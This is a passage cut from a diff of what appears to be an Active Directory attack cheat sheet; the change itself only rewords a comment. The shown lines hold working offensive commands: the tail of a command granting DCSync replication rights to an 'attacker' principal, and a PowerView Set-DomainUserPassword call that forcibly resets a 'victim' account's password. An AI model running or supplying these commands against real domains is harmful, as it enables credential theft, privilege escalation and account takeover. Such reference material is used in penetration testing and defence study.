 -rights DCSync -principal attacker -target-dn "DC=domain,DC=local"

-# ForceChangePassword → change user password without knowing current
+# ForceChangePassword — change a user's password without knowing the current one

 Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force)